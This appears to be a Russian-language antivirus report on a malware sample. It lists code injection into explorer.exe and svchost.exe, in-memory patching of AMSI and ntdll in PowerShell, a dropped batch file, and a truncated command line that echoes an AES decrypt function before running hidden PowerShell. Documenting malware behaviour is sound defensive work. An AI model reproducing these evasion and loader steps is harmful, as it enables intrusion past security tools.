Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
- <SYSTEM32>\svchost.exe
Патчит код
в динамической библиотеке
- Процесс svchost.exe, модуль pdh.dll
в динамической библиотеке AMSI
- Процесс powershell.exe, модуль Amsi.dll
в динамической библиотеке NTDLL
- Процесс powershell.exe, модуль ntdll.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\temp_script.bat
- nul
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\temp_script.bat" "
- '<SYSTEM32>\net.exe' file
- '<SYSTEM32>\net1.exe' file
- '<SYSTEM32>\cmd.exe' /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[Syst...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden
